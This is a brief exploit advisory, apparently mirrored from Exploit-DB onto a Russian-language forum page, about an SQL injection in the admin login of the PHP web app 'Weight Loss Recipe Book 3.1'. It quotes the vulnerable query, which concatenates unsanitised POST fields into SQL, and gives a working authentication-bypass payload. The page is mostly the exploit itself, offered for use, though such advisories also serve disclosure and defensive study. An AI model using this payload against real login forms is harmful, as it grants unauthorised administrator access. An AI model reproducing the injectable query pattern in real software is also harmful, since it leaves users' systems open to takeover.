- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7728
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-01-11
		Код:
	
	###############################
# Weight Loss Recipe Book 3.1 #
###############################
Autore: x0r
Emails: x0r@live.it \ andry2000@hotmail.it
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################
Bug In \wlrb_files\admin-login.php
SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1
##############################
Greetz: EdGaR :P
# milw0rm.com [2009-01-11]- Источник
- www.exploit-db.com
 
 
		